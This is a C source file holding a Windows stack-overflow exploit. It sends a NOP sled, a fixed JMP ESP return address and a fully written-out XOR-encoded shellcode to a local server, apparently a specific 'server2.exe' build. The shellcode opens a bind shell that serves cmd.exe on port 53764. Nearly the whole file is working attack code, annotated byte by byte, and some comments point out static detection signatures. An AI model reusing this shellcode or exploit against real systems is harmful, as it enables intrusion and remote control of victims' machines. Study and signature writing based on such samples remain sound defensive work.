
#include <winsock2.h>
#include <winsock2.h>
#include <stdio.h>
#pragma comment (lib, "ws2_32")
#define WINXP

#ifdef WINXP
//#define JUMPESP "\xfc\x18\xd4\x77" user32.dll
#define JUMPESP "\xfb\x7b\xa2\x71" //ws2_32.dll
#endif

#ifdef WIN2000
#define JUMPESP "\x2a\xe3\xe2\x77"
#endif
#ifdef WIN98
#define JUMPESP "\xa3\x95\xf7\xbf"
#endif

/* Saved-return-address overwrite. JUMPESP is the 4-byte address selected by
 * the OS macro above (on WINXP a fixed location inside ws2_32.dll); the
 * 8-byte array is zero-filled after the string literal's NUL. Because the
 * address is fixed per OS build, it is both the payload's main point of
 * fragility and a static byte pattern for detection. main() copies only the
 * first 4 bytes, since strcpy stops at the NUL.
 */
unsigned char eip[8] = JUMPESP;
/* Encoded bind-shell payload. Layout, as annotated inline below:
 *   - two NOPs, then a decoder that locates the ff ff ff ff 0d 0a trailer
 *     and XORs the 0xc6 bytes of data in front of it with 0x99;
 *   - import resolution through two hard-coded IAT slots of the target
 *     binary (server2.exe: 0x004261ec LoadLibraryA, 0x004261e8
 *     GetProcAddress), so the payload only works against that exact build;
 *   - socket/bind/listen, two CreatePipe calls, CreateProcessA("cmd.exe"),
 *     then a PeekNamedPipe/ReadFile/send and recv/WriteFile relay loop;
 *   - the XOR-0x99 data area: module and function names, the bind port
 *     (0x4b9d ^ 0x9999 = 53764) and the command line "cmd.exe".
 * Detection notes: the XOR key 0x99, the fixed IAT addresses, the fixed
 * bind port and the ff ff ff ff 0d 0a trailer do not vary between runs and
 * are straightforward static signatures for the request on the wire.
 * The array is declared with 580 elements; main() sends 560 payload bytes.
 */
unsigned char sploit[580] = {
	0x90, /* nop */
	0x90, /* nop */
/* decoding data area, xor with 0x99 */
	0x8b, 0xfc, /* mov edi,esp */
	0x33, 0xc0, /* xor eax,eax ;eax = 0*/
	0x50, /* push eax ;push $0*/
	0xf7, 0xd0, /* not eax ;eax = 0xffffffff*/
	0x50, /* push eax ;push 0xffffffff*/
	0x59, /* pop ecx ;ecx = 0xffffffff*/
	0xf2, 0xaf, /* repne scas  dword ptr [edi] ;edi=end of the shellcode */
				/* find 0xff, 0xff, 0xff, 0xff, 0x0d, 0x0a (see the ending) */
	0x59, /* pop ecx ;ecx = 0*/
	0xb1, 0xc6, /* mov cl, C6 ;ecx=0xc6 (bytes of encoded module&function names)*/
	0x8b, 0xc7, /* mov eax, edi ;eax = end of the shellcode */
	/* XorData: */
	0x48, /* dec eax ;step by one byte */
	0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 ;decode */
	0xe2, 0xfa, /* loop XorData ;until ecx = 0 */

/* load KERNEL32 function addresses */
	0x33, 0xf6, /* xor esi, esi ;esi=0*/
	0x96, /* xchg eax,esi ;eax=0, esi=begin addr of data*/
	0xbb, 0x99, 0xec, 0x61, 0x42, 	/* mov ebx, IAT_LoadLibrary */
	0xc1, 0xeb, 0x08,				/* shr ebx, 08 ;no null byte */
									/* 0x4261ec99 >> 8 = 0x004261ec */
									/* address of IAT of LoadLibraryA in server2.exe */
									/* (fixed for one build of the target; any relink breaks it) */
	0x56, /* push esi ;push address of "KERNEL32" in the stack */
	0xff, 0x13, /* call dword ptr [ebx] ;call LoadLibrary("KERNEL32") */
	0x8b, 0xd0, /* mov edx, eax ;move base address of Kernel32.dll to edx */
	0xfc, /* cld ;clear direction flag, */
		  /* to cause string operations to process from left to right */
	0x33, 0xc9, /* xor ecx, ecx ;ecx = 0*/
	0xb1, 0x0b, /* mov cl, 0B ;ecx=0x0b (count of functions need to GetProcAddress in Kernel32) */
	0x49, /* dec ecx ;ecx dec by one*/
			/* FIXME, why not "mov cl 0xoa" */
			/* NOTE(review): the direct form would contain the byte 0x0a; the buffer is */
			/* terminated by 0x0d 0x0a, so presumably 0x0a is a delimiter to the target */
			/* and has to be avoided in the payload - confirm against the server's parser */
	/* loadKernelProcess: */
	0x32, 0xc0, /* xor al, al ;al = 0*/
	0xac, /* lods byte ptr [esi] ;al = [esi], get the byte at esi(data) into al*/
	0x84, 0xc0, /* test al, al ;test for null byte*/
	0x75, 0xf9, /* jne loadKernelProcess */
	0x52, /* push edx ;store Kernel32 module address */
	0x51, /* push ecx ;store ecx (count) */
	0x56, /* push esi ;function name address (call param2)*/
	0x52, /* push edx ;Kernel32 module address (call param1)*/ 
	0xb3, 0xe8, /* mov bl e8; now ebx = 0x004261e8 */
				/* address of IAT of GetProcAddress */
	0xff, 0x13, /* call dword ptr [ebx] ;call GetProcAddress to get the function's address */
	0xab, /* stos dword ptr [edi] */
		  /* store the return address in eax to memory indexed by edi (end of the shellcode) */
	0x59, /* pop ecx ;restore the ecx (count) from the stack */
	0x5a, /* pop edx ;restore the Kernel32 module base address from the stack */
	0xe2, 0xec, /* loop loadKernelProcess ;loop and get all function address */

/* load WSOCK32 function addresses */
	0x32, 0xc0, /* xor al, al */
	0xac, /* lods byte ptr [esi] */
	0x84, 0xc0, /* test al, al */
	0x75, 0xf9, /* jne 00000176 ;get next module (WSOCK32) name address*/
	0xb3, 0xec, /* mov bl ec, now ebx = 0x004261ec */
				/* address of IAT of LoadLibrary */
	0x56, /* push esi ;call param, address of module name*/
	0xff, 0x13, /* call dword ptr [ebx] ;call LoadLibrary("WSOCK32")*/
	0x8b, 0xd0, /* mov edx, eax ;move base address of WSOCK32.dll to edx */
	0xfc, /* cld ;clear direction flag, */
		  /* to cause string operations to process from left to right */
	0x33, 0xc9, /* xor ecx, ecx ;ecx = 0*/
	0xb1, 0x06, /* mov cl, 06 */
	/* loadSocketProcess: */
	0x32, 0xc0, /* xor al, al */
	0xac, /* lods byte ptr [esi] */
	0x84, 0xc0, /* test al, al */
	0x75, 0xf9, /* jne loadSocketProcess */
	0x52, /* push edx ;store WSOCK32 module address */
	0x51, /* push ecx ;store ecx (count) */
	0x56, /* push esi ;function name address (call param2)*/
	0x52, /* push edx ;WSOCK32 module address (call param1)*/ 
	0xb3, 0xe8, /* mov bl e8; now ebx = 0x004261e8 */
				/* address of IAT of GetProcAddress */
	0xff, 0x13, /* call dword ptr [ebx] ;call GetProcAddress to get the function's address */
	0xab, /* stos dword ptr [edi] */
		  /* store the return address in eax to memory indexed by edi (end of the shellcode) */
	0x59, /* pop ecx ;restore the ecx (count) from the stack */
	0x5a, /* pop edx ;restore the WSOCK32 module base address from the stack */
	0xe2, 0xec, /* loop loadSocketProcess */

/*new socket and bind*/
	/*listenFD=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);*/	
	0x83, 0xc6, 0x05, /* add esi, 0x05 ;esi now pointer to sockstruc*/
					  /* edi=esp+4+shellcode+function_table(16*4) ;end of the shellcode*/
	0x33, 0xc0, /* xor eax, eax ;*/
	0x50, /* push eax ;protocol=0*/
	0x40, /* inc eax */
	0x50, /* push eax ;SOCK_STREAM=1*/
	0x40, /* inc eax */
	0x50, /* push eax ;AF_INET=2*/
	0xff, 0x57, 0xe8, /* call [edi-18] ;call socket(2,1,0)*/
	0x93, /* xchg eax,ebx ;ebx now contain listenFD*/
	/*ret=bind(listenFD,(sockstruc *)&server,sizeof(server));*/
	0x6a, 0x10, /* push 00000010 ;length of sockstruc*/
	0x56, /* push esi ;address of sockstruc*/
	0x53, /* push ebx ;listenFD*/
	0xff, 0x57, 0xec, /* call [edi-14] ;call bind(listenFD,(sockstruc *)&server,sizeof(server))*/
	0x6a, 0x02, /* push 00000002 ;2 connections*/
	0x53, /* push ebx ;SOCKET*/
	0xff, 0x57, 0xf0, /* call [edi-10] ;listen(SOCKET,2)*/ 

/*CreatePipe*/
	0x33, 0xc0, /* xor eax, eax */
	0x57, /* push edi */
	0x50, /* push eax ;0*/
	0xb0, 0x0c, /* mov al, 0C */
	0xab, /* stos dword ptr [edi] */
	0x58, /* pop eax */
	0xab, /* stos dword ptr [edi] */
	0x40, /* inc eax */
	0xab, /* stos dword ptr [edi] ;create SECURITY_ATTRIBUTES sa at edi*/
	0x5f, /* pop edi */
	0x48, /* dec eax ;eax=0*/
	0x50, /* push eax */
	0x57, /* push edi ;sa */
	0x56, /* push esi ;to ret write pipe1, sockstruc is rubbish now */
	0xad, /* lods dword ptr [esi] ;esi+4; eax=[esi]*/
	0x56, /* push esi ;to ret read pipe1 */
	0xff, 0x57, 0xc0, /* call [edi-40] ;ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); */ 
	0x48, /* dec eax ;eax=0*/
	0x50, /* push eax */
	0x57, /* push edi ;sa */
	0xad, /* lods dword ptr [esi] ;esi+4; eax=[esi]*/
	0x56, /* push esi ;to ret write pipe2, sockstruc is rubbish now */
	0xad, /* lods dword ptr [esi] ;esi+4; eax=[esi]*/
	0x56, /* push esi ;to ret read pipe2 */
	0xff, 0x57, 0xc0, /* call [edi-40] ;ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); */ 

/*run shell*/
	0x48, /* dec eax ;eax=0*/
	0xb0, 0x44, /* mov al, 44 */
	0x89, 0x07, /* mov dword ptr [edi], eax */
	0x57, /* push edi */
	0xff, 0x57, 0xc4, /* call [edi-3C] ;GetStartupInfo si, save at edi*/
	0x33, 0xc0, /* xor eax, eax */
	0x8b, 0x46, 0xf4, /* mov eax, dword ptr [esi-0C] */
	0x89, 0x47, 0x3c, /* mov dword ptr [edi+3C], eax ;si.hStdOutput=hWritePipe1*/
	0x89, 0x47, 0x40, /* mov dword ptr [edi+40], eax ;si.hStdError=hWritePipe1*/
	0x8b, 0x06, /* mov eax, dword ptr [esi] */
	0x89, 0x47, 0x38, /* mov dword ptr [edi+38], eax ;si.hStdInput=hReadPipe2 */
	0x33, 0xc0, /* xor eax, eax */
	0x66, 0xb8, 0x01, 0x01, /* mov ax, 0x0101 */
	0x89, 0x47,	0x2c, /* mov dword ptr [edi+2C], eax ;dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES*/
	0x57, /* push edi ;address of si*/
	0x57, /* push edi ;address of si*/
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;lpCurrentDirectory = NULL*/
	0x50, /* push eax ;lpEnvironment = NULL*/
	0x50, /* push eax ;dwCreationFlags = NULL*/
	0x40, /* inc eax */
	0x50, /* push eax ;bInheritHandles = true*/
	0x48, /* dec eax */
	0x50, /* push eax ;lpThreadAttributes=0*/
	0x50, /* push eax ;lpProcessAttributes=0*/
	0xad, /* lods dword ptr [esi] */
	0x56, /* push esi ;lpCommandLine=esi="cmd.exe"*/
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;lpApplicationName=NULL*/
	0xff, 0x57, 0xc8, /* call [edi-38] ;call CreateProcessA, eax=1 ok, eax=0 error*/
	0xff, 0x76, 0xf0, /* push [esi-10] */
	0xff, 0x57, 0xcc, /* call [edi-34] ;CloseHandle*/
	0xff, 0x76, 0xfc, /* push [esi-04] */
	0xff, 0x57, 0xcc, /* call [edi-34] ;CloseHandle*/
/*bind the shell with socket through the pipes*/
	0x48, /* dec eax ;0*/
	0x50, /* push eax */
	0x50, /* push eax */
	0x53, /* push ebx ;ebx contains the listenFD SOCKET */
	0xff, 0x57, 0xf4, /* call [edi-0C] ;SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);*/
	0x8b, 0xd8, /* mov ebx, eax ;ebx contains new clientFD(shell) SOCKET*/
	0x33, 0xc0, /* xor eax, eax */
	0xb4, 0x04, /* mov ah, 04 ;1024*/
	0x50, /* push eax */
	0xc1, 0xe8, 0x04, /* shr eax, 04; eax=64: GMEM_FIXED+GMEM_ZEROINIT*/
	0x50, /* push eax */
	0xff, 0x57, 0xd4, /* call [edi-2C] ;GlobalAlloc 1024*/
	0x8b, 0xf0, /* mov esi, eax ;esi contains the buffer*/
	/*PeekPipe: */
	0x33, 0xc0, /* xor eax, eax */
	0x8b, 0xc8, /* mov ecx, eax */
	0xb5, 0x04, /* mov ch, 04 */
	0x50, /* push eax ;lpBytesLeftThisMessage =0*/
	0x50, /* push eax ;lpTotalBytesAvail=0 */
	0x57, /* push edi ;lpBytesRead*/
	0x51, /* push ecx ;nBufferSize=1024*/
	0x56, /* push esi ;lpBuffer*/
	0xff, 0x77, 0xa8, /* push [edi-58] ;hReadPipe1*/
	0xff, 0x57,	0xd0, /* call [edi-30] ;ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);*/
	0x83, 0x3f, 0x01, /* cmp dword ptr [edi], 00000001 ;[edi] contains bytes to read*/
	0x7c, 0x22, /* jl GetUserInput */
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;lpOverlapped = NULL*/
	0x57, /* push edi ;lpNumberOfBytesRead*/
	0xff, 0x37, /* push dword ptr [edi] ;nNumberOfBytesToRead*/
	0x56, /* push esi ;lpBuffer*/
	0xff, 0x77, 0xa8, /* push [edi-58] ;hReadPipe1*/
	0xff, 0x57, 0xdc, /* call [edi-24] ;ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);*/
	0x0b, 0xc0, /* or eax, eax */
	0x74, 0x2f, /* je GameOver */
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;flag=0*/
	0xff, 0x37, /* push dword ptr [edi] ;len*/
	0x56, /* push esi ;buf*/
	0x53, /* push ebx ;clientFD*/
	0xff, 0x57, 0xf8, /* call [edi-08] ;ret=send(clientFD,Buff,lBytesRead,0);*/
	0x6a, 0x50, /* push 00000050 ;*/
	0xff, 0x57, 0xe0, /* call [edi-20] ;sleep(50)*/
	0xeb, 0xc8, /* jmp PeekPipe */
	/* GetUserInput: */
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;eax=0*/
	0xb4, 0x04, /* mov ah, 04 */
	0x50, /* push eax ;1024*/
	0x56, /* push esi ;buf*/
	0x53, /* push ebx ;clientFD*/
	0xff, 0x57, 0xfc, /* call [edi-04] ;lBytesRead=recv(clientFD,Buff,1024,0);*/
	0x57, /* push edi ;lpOverlapped*/
	0x33, 0xc9, /* xor ecx, ecx */
	0x51, /* push ecx ;pointer to number of bytes written*/
	0x50, /* push eax ;nNumberOfBytesToWrite*/
	0x56, /* push esi ;buf*/
	0xff, 0x77, 0xac, /* push [edi-54] ;hWritePipe2*/
	0xff, 0x57, 0xd8, /* call [edi-28] ;ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)*/
	0x6a, 0x50, /* push 00000050 ;*/
	0xff, 0x57, 0xe0, /* call [edi-20] ;sleep(50)*/
	0xeb, 0xaa, /* jmp PeekPipe */
	/* GameOver: */
	0x50, /* push eax */
	0xff, 0x57, 0xe4, /* call [edi-1C] ;ExitProcess*/
/*Our Data*/
	/*  ^^^^ start of module and function name table */
	/*  Everything from here to the 0x9b 0x99 pair is XOR-0x99 encoded: module */
	/*  names and NUL-separated function names, 0xc6 bytes in total (see mov cl, C6). */
	0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
	0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
	0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
	0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
	0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
	0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
	0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
	0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
	0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
	0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
	0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
	0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
	0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
	0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
	0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
	0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h=53764 (network byte order 0xd2 0x04)
	0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
	0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff, /* "cmd.exe\0" then the ff ff ff ff marker the decoder scans for */
	0x0d, 0x0a /* CR LF trailer; the buffer contains no 0x00 byte, which main() relies on for strcpy */
};

/* Sends the overflow request to a server listening on the loopback interface.
 *
 * Builds a single request in Buff: 56 bytes of 0x90 (NOP sled), the 4-byte
 * eip overwrite at offset 56, then the sploit bytes at offset 60, and sends
 * 56+4+560 = 620 bytes to 127.0.0.1:3764. Both strcpy calls depend on the
 * copied data containing no 0x00 byte (the payload is written to avoid
 * NULs); the NUL that the first strcpy places at Buff[60] is overwritten by
 * the second. strcpy is used without an explicit #include <string.h>.
 *
 * No Winsock return value (WSAStartup, socket, connect, send) is checked and
 * the exit status is always 1. The transmitted bytes are fully deterministic,
 * so the request is a static network signature: a run of 56 NOPs followed by
 * the fixed return address and the fixed encoded payload.
 */
int main()
{
        WSADATA wsa;
        SOCKET sockFD;
        char Buff[1024],*sBO;   /* sBO only aliases Buff for the send() call */

        WSAStartup(MAKEWORD(2,2),&wsa);

        sockFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

        struct sockaddr_in server;

        server.sin_family = AF_INET;
        server.sin_port = htons(3764);
        server.sin_addr.s_addr=inet_addr("127.0.0.1");

        connect(sockFD,(struct sockaddr *)&server,sizeof(server));
        /* 56-byte NOP sled, then the saved-return-address slot at offset 56. */
        for(int i=0;i<56;Buff[i++]=0x90);
        strcpy(Buff+56,(char *)eip);    /* 4 bytes + NUL at Buff[60] */
        strcpy(Buff+60,(char *)sploit); /* overwrites that NUL; copies up to sploit's first 0x00 */
        sBO = Buff;
        send(sockFD,sBO,56+4+560,0);

        closesocket(sockFD);
        WSACleanup();
        return 1;

}
